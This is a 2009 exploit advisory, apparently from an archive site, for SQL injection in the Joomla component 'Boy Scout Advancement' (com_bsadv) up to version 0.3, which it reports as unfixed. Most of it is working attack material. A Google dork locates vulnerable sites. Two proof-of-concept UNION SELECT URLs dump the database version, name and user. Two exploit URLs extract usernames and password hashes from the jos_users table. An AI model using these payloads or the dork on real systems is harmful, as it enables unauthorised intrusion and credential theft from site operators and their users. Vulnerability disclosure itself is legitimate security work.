Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21874
HistoryMay 25, 2009 - 12:00 a.m.

MULTIPLE SQL INJECTION VULNERABILITIES --Joomla Component 'Boy Scout Advancement' <= v-0.3 (com_bsadv)-->

2009-05-2500:00:00
vulners.com
35

MULTIPLE SQL INJECTION VULNERABILITIES --Joomla Component 'Boy Scout Advancement' <= v-0.3 (com_bsadv)–>

CMS INFORMATION:

–>WEB: http://bsadv.sourceforge.net/
–>DOWNLOAD: http://bsadv.sourceforge.net/
–>DEMO: N/A
–>CATEGORY: Joomla/Component
–>DESCRIPTION: BSAdv is a Joomla 1.5 component for Boy Scout unit data and advancement
data for Boy Scout Troops in the United States…
–>RELEASED: 2009-02-01

CMS VULNERABILITY:

–>TESTED ON: firefox 3
–>DORK –> inurl:"?option=com_bsadv"
–>CATEGORY: SQL INJECTION
–>AFFECT VERSION: <= 0.3
–>Discovered Bug date: 2009-05-25
–>Reported Bug date: 2009-05-25
–>Fixed bug date: Not fixed
–>Info patch: Not fixed
–>Author: YEnH4ckEr
–>mail: y3nh4ck3r[at]gmail[dot]com
–>WEB/BLOG: N/A
–>COMMENT: A mi novia Marijose…hermano,cunyada, padres (y amigos xD) por su apoyo.
–>EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

############################
///////////////////////////

SQL INJECTION VULNS (SQLi):

///////////////////////////
############################

<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON ++++++++++++++++±-------->>>>


PROOFS OF CONCEPT:

[++] GET var –> 'id'

http://[HOST]/[PATH]/index.php?option=com_bsadv&amp;controller=peruse&amp;task=event&amp;id=-1+UNION+ALL+SELECT+1,version&#40;&#41;,database&#40;&#41;,user&#40;&#41;&#37;23


[++] GET var --&gt; &#39;id&#39;


~~~~~&gt;
http://[HOST]/[PATH]/index.php?option=com_bsadv&amp;controller=peruse&amp;task=account&amp;id=-1+UNION+ALL+SELECT+database&#40;&#41;,version&#40;&#41;&#37;23&amp;Itemid=57



[++[Return]++] ~~~~~&gt; User, version or database.



-----------
EXPLOITS:
-----------



~~~~~&gt;
http://[HOST]/[PATH]/index.php?option=com_bsadv&amp;controller=peruse&amp;task=event&amp;id=-1+UNION+ALL+SELECT+1,concat&#40;username,0x3A3A3A,password&#41;,3,4+FROM+jos_users+WHERE+id=62&#37;23



[++[Return]++] ~~~~~&gt; Username:::password id=62



~~~~~&gt;
http://[HOST]/[PATH]/index.php?option=com_bsadv&amp;controller=peruse&amp;task=account&amp;id=-1+UNION+ALL+SELECT+username,password+FROM+jos_users+WHERE+id=62&#37;23&amp;Itemid=57



[++[Return]++] ~~~~~&gt; Username and password id=62



#######################################################################
#######################################################################
##*******************************************************************##
##      SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ...     ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################